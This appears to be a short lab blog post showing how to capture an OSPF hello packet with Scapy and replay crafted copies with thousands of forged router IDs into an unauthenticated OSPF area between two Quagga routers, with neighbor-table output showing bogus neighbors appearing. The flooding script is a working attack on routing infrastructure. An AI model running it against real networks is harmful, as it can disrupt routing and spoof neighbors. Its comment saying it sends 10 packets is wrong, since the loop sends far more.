send OSPF hello packets with scapy

Here’s an explanation of how to send OSPF hello packets with scapy.
I just referred to http://blog.egofuzzer.net/2011/04/ospfs-evil-neighbor.html.
many , many thanks !

192.168.0.0/24 ,   area 0.0.0.0 , no authentication quagga1 0.254  ---------vSW -------- 0.253 quagga2                      |                     0.30               scapy machine ( sends OSPF hello )

I’ve already configured OSPF relationship between quagga1 and quagga2.
On the scapy box ( ubuntu 12.04 ) , get an OSPF hello packet with scapy to make a crafted OSPF hello packet.

sniff OSPF hello packets.

# scapy INFO: No IPv6 support in kernel WARNING: No route found for IPv6 destination :: (no default route?) Welcome to Scapy (2.2.0) >>> load_contrib('ospf') >>> sniff(filter="ip dst 224.0.0.5",count=1) <Sniffed: TCP:0 UDP:0 ICMP:0 Other:1> >>> _[0].show() ###[ Ethernet ]###  dst= 01:00:5e:00:00:05  src= 52:54:00:d4:ab:3e  type= 0x800 ###[ IP ]###     version= 4L     ihl= 5L     tos= 0xc0     len= 68     id= 56607     flags=     frag= 0L     ttl= 1     proto= ospf     chksum= 0x39d6     src= 192.168.0.254 <- quagga1     dst= 224.0.0.5     \options\ ###[ OSPF Header ]###        version= 2        type= Hello        len= 48        src= 192.168.1.254        area= 0.0.0.0        chksum= 0xf300        authtype= Null        authdata= 0x0 ###[ OSPF Hello ]###           mask= 255.255.255.0           hellointerval= 10           options= E           prio= 1           deadinterval= 40           router= 192.168.0.253           backup= 192.168.0.254           neighbors= ['192.168.2.254'] >>>

save above hello packet as a pcap file.

>>> wrpcap("ospf_hello.pcap",_[0])

# tshark -r ospf_hello.pcap -p ospf Running as user "root" and group "root". This could be dangerous.  1   0.000000 192.168.0.254 -> 224.0.0.5    OSPF 82 Hello Packet

this script will send 10 OSPF hello packets

# cat send_ospf_hello.py #!/usr/bin/env python from scapy.all import * load_contrib('ospf') pkts=rdpcap('ospf_hello.pcap') h=pkts[0] for i in range(0,200):        for j in range(1,100):                host="192.168.%s.%s" % (i,j)                h[IP].src="192.168.0.30"                h[IP].chksum=None                h[OSPF_Hdr].src=host                h[OSPF_Hdr].chksum=None                h[OSPF_Hello].router=host                h[OSPF_Hello].backup="192.168.0.254"                h[OSPF_Hello].neighbor="192.168.0.254"                sendp(h, verbose=1)

send OSPF packets

# ./send_ospf_hello.py WARNING: No route found for IPv6 destination :: (no default route?) . Sent 1 packets. <snip>

before sending crafted OSPF hello packets.

quagga1# show  ip ospf  neighbor    Neighbor ID Pri State           Dead Time Address         Interface   RXmtL RqstL DBsmL 192.168.2.254     1 Full/DR           35.435s 192.168.0.253   eth0:192.168.0.254       1     0     0 quagga1#

while sending crafted hello packets.

quagga1# show  ip ospf  neighbor    Neighbor ID Pri State           Dead Time Address         Interface   RXmtL RqstL DBsmL 192.168.68.78     1 Init/DROther      39.997s 192.168.0.30    eth0:192.168.0.254       0     0     0 192.168.2.254     1 Full/DR           39.250s 192.168.0.253   eth0:192.168.0.254       0     0     0 quagga1# show  ip ospf  neighbor    Neighbor ID Pri State           Dead Time Address         Interface   RXmtL RqstL DBsmL 192.168.72.10     1 Init/DROther      39.998s 192.168.0.30    eth0:192.168.0.254       0     0     0 192.168.2.254     1 Full/DR           38.442s 192.168.0.253   eth0:192.168.0.254       0     0     0 quagga1#

# tshark -r crafted_ospf.pcap -R '(ip.addr==192.168.0.30)' | head -5  2   1.779586 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet  3   1.781786 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet  4   1.783419 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet  5   1.785150 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet  6   1.787003 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet